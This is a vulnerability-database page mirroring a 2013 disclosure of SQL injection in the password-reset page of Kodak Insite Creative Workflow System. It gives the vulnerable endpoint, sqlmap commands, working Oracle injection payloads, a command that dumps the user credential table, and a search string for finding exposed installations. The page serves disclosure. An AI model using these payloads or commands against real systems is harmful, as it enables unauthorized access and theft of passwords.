Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

Kodak Insite Creative Workflow System SQL Injection

🗓️ 19 Feb 2013 00:00:00Reported by Robert at HipcrimeType 
packetstorm
 packetstorm🔗 packetstormsecurity.com👁 28 Views

Kodak Insite Creative Workflow System SQL Injection vulnerability in the "Forgot Your Password?" page, allowing unauthorized access to usernames and passwords. Also, potential release of a fix in September

Code
`Hello ...  
  
While investigating a recent installation of Kodak's Insite Creative  
Workflow System (for my current employer), an SQL Injection vulnerability  
was discovered in its "Forgot Your Password?" page.  
  
An example of this application can be seen on the Kodak site.  
  
https://creativeworkflow.kodak.com/TwAmWeb/login.asp  
  
Many other copies of Kodak Insite can be located with any search engine  
by looking for the string "insite creative login".  
  
Our installation was setup on an internal site, and as such, SQLMAP was  
applied to our local copy, as follows.  
  
sqlmap.py -u 'http://localhost/TwAmWeb/EmailPassword.asp'  
--data='user_name=1&Language=en' -p user_name --risk=3 --level=5 -o  
  
sqlmap identified the following injection points with a total of 163  
HTTP(s) requests:  
---  
Place: POST  
Parameter: user_name  
Type: error-based  
Title: Oracle AND error-based - WHERE or HAVING clause (XMLType)  
Payload: user_name=1') AND 5065=(SELECT  
UPPER(XMLType(CHR(60)||CHR(58)||CHR(118)||CHR(110)||CHR(101)||CHR(58)||(SELECT  
(CASE WHEN (5065=5065) THEN 1 ELSE 0  
END) FROM  
DUAL)||CHR(58)||CHR(116)||CHR(121)||CHR(112)||CHR(58)||CHR(62))) FROM  
DUAL) AND ('yCTb'='yCTb&Language=en  
  
Type: AND/OR time-based blind  
Title: Oracle OR time-based blind  
Payload: user_name=-2979') OR  
1635=DBMS_PIPE.RECEIVE_MESSAGE(CHR(76)||CHR(80)||CHR(114)||CHR(122),5)  
AND ('NjHU'='NjHU&Language=en  
---  
[11:52:56] [INFO] the back-end DBMS is Oracle  
web server operating system: Windows 2003  
web application technology: ASP.NET, Microsoft IIS 6.0, ASP  
back-end DBMS: Oracle  
[11:52:56] [WARNING] HTTP error codes detected during testing:  
500 (Internal Server Error) - 44 times  
  
A little fishing around and it becomes obvious that all usernames/passwords  
can be downloaded like this:  
  
sqlmap.py -u 'http://localhost/TwAmWeb/EmailPassword.asp'  
--data='user_name=1&Language=en' --risk=3 --level=5 -o -D PRINERGY -T  
DBCS_REMOTEUSER --columns --dump  
  
Supposedly Kodak will be releasing a fix in September.  
  
... Robert  
  
  
  
  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
19 Feb 2013 00:00Current
7.4High risk
Vulners AI Score7.4
kodakinsite creative workflow systemsql injectionvulnerabilityforgot your passwordunauthorized accessusernamespasswordsseptember fix
28